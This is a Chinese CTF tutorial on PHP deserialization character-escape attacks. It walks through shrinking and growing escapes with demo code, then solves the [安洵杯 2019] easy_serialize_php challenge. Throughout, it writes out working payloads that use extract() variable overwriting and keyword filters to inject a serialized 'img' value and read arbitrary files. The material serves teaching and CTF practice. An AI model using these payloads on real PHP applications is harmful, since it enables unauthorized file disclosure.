反序列化的特性

<?php
/*
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'highlight_file';
$_SESSION['img'] = base64_encode('/d0g3_fllllllag'); //d0g3_f1ag.php
$serialize_info = serialize($_SESSION);echo $serialize_info;*/$str = 'a:3:{s:4:"user";s:5:"guest";s:8:"function";s:14:"highlight_file";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}';
print_r (unserialize($str));

这是应该正常的反序列化代码，没有添加任何字符

但是我们可以往 }符号 外面尝试再加入一些字符

可以发现，添加了asfd后，反序列化依旧正常执行。只要 } 符号外面的字符，反序列化对象的时候都会忽略掉。

字符逃逸

缩短逃逸

初入了解

实例代码

<?php
function filter($string){$filter = '/p/i';return preg_replace($filter,'',$string);
}
$username = 'ppppppppppppp';
$age = $_GET['age']; // c";i:1;s:2:"20";}$age = '10';  // 原本的值
extract($_GET); //变量覆盖$user = array($username, $age);
var_dump(serialize($user));
echo "<pre>";
$r = filter(serialize($user));
var_dump($r);
var_dump(unserialize($r));
?>

我们知道代码存在过滤，本来的p替换为空

在php反序列化中，比如这个数组找不到对应13个字符的值，它会往后寻找。然后读取进去

这里我们通过变量覆盖，对age变量进行传参，可以发现反序列化正常的执行成功了

c";i:1;s:2:"20";}

我们想修改的age的值也成功修改，这也就是代表我们逃逸成功了

反序列化将会从这里开始读取字符串

可以看见刚好为13个字符

";i:1;s:17:"c

进阶测试

实例代码

<?php
function filter($string){$filter = '/p/i';return preg_replace($filter,'',$string);
}$usernmae = $_GET['username'];
$password = $_GET['password']; // c";i:1;s:2:"20";}
$username = 'admin';
$password = '123456';  // 原本的值
extract($_GET); //变量覆盖$user = array($username, $password);
var_dump(serialize($user));
echo "<pre>";
$r = filter(serialize($user));
var_dump($r);
var_dump(unserialize($r));
?>

在这里，我们的目标仅仅是通过变量覆盖，然后来修改password的值
payload构造如下：

?username=pppppppppppp&password=";i:1;s:6:"654321";}

可以发现被修改成654321，成功的进行了字符逃逸
p替换为空之后，说明了可以逃逸的字符为12个字符，最后通过 ";闭合让反序列化正常执行，最后}符号除掉了我们不想要的字符。

增长逃逸

其实了解了缩短逃逸的原理，会发现增长逃逸也差不多，甚至更加简单

实例代码

<?php
function filter($string){$filter = '/p/i';return preg_replace($filter,'aa',$string);
}$usernmae = $_GET['username'];
$password = $_GET['password']; // c";i:1;s:2:"20";}
$username = 'admin';
$password = '123456';  // 原本的值
extract($_GET); //变量覆盖$user = array($username, $password);
var_dump(serialize($user));
echo "<pre>";
$r = filter(serialize($user));
var_dump($r);
var_dump(unserialize($r));
?>

原理

在这里，我们的目的同样是修改123456这个值

过滤函数将我们反序列化后的字符串20个p就会替换为40个a

但是我们可以看见数组所读取的字符串是20个字符，这个时候我们只需要在溢出的字符p输入相对应的长度的payload，就可以进行修改了。比如这个payload长度就是20

";i:1;s:6:"654321";}

我们将payload放入长度相等的过滤p字符后面

?username=pppppppppppppppppppp";i:1;s:6:"654321";}

可以看见反序列化成功，password的值也成功修改了

案例

[安洵杯 2019]easy_serialize_php

进入主页点击这个

然后就出现了以下源代码

<?php$function = @$_GET['f'];function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}if($_SESSION){unset($_SESSION);
}$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;extract($_POST);if(!$function){echo '<a href="index.php?f=highlight_file">source_code</a>';
}if(!$_GET['img_path']){$_SESSION['img'] = base64_encode('guest_img.png');
}else{$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}$serialize_info = filter(serialize($_SESSION));if($function == 'highlight_file'){highlight_file('index.php');
}else if($function == 'phpinfo'){eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo['img']));
}

代码分析

通过分析代码可以看见f是一个传参变量，当它等于phpinfo时，根据题目所说会有flag的提示


这里我们构造传参

?f=phpinfo

在这里可以发现flag的提示文件

为什么使用auto_append_file 查找呢？因为它是一个包含文件的选项。其中当f传参变量等于show_image时将会读取文件，所以知道是文件读取才能找到flag

可以发现读取flag，必须要经过反序列化，这里反序列化还有过滤函数会替换关键字为空

怎么构造序列化?

首先我们找到一些的可控变量，当img_path传参不存在的时候，将会使用img进行传参，所以这里默认存在img可以进行传参

由于function默认的传参不是我们想要的show_image，如果默认不管的话将会扰乱我们读取文件
初始构造脚本，

<?php
function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'highlight_file';
$_SESSION['img'] = base64_encode('d0g3_f1ag.php'); //读取的文件$serialize_info = filter(serialize($_SESSION));var_dump (serialize($_SESSION));
echo "<br><br><br>";
echo $serialize_info."<br><br><br>";
var_dump (unserialize($serialize_info));

正常情况下，代码应该是这样子走的。我们可以发现这个字符串阻止了我们的文件读取

这个时候就需要用到了php反序列化-字符逃逸的缩短逃逸，因为代码存在替换函数，将会导致字符的缺失。

";s:8:"function";s:14:

将这个字符串进行读取，将会截断后面没用的内容

缩短逃逸-构造payload

这里使用恶意的字符串故意让替换函数替换为空，刚好22个字符

phpphpphpphpphpphpflag

可以看见读取字符串之后，反序列化失败，是因为该数组还没有闭合

现在我们来构造function传参的值
运行以下代码

<?php
function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}$_SESSION["user"] = 'phpphpphpphpphpphpflag';
$_SESSION['function'] = ';s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"aa";s:1:"c";}highlight_file';
$_SESSION['img'] = base64_encode('d0g3_f1ag.php');$serialize_info = filter(serialize($_SESSION));var_dump (serialize($_SESSION));
echo "<br><br><br>";
echo $serialize_info."<br><br><br>";
var_dump (unserialize($serialize_info));

可以看见反序列化执行成功，字符串成功逃逸

解释一下这个传参：

$_SESSION['function'] = ';s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"aa";s:1:"c";}highlight_file';

• s:2:“aa”;s:1:“c”; 是一个数组，因为数组一共有三个，所以我们自己构造了一个函数
• ";s:8:“function”;s:71: 是反序列化读取的字符串，后面直接截断了，我们想要的字符串
• 利用这个符号 } 阶段了没必要的字符串

由于代码中存在变量覆盖

这里我们使用POST请求传参
payload：

/index.php?f=show_image

_SESSION[user]=phpphpphpphpphpphpflag&_SESSION[function]=;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"hh";s:1:"a";}

查看源代码，可以发现有个一flag的提示文件

将这个字符串，进行base64加密即可，然后替换原来的base64文件

;s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"aa";s:1:"c";}

最后可以看见成功读取到了flag了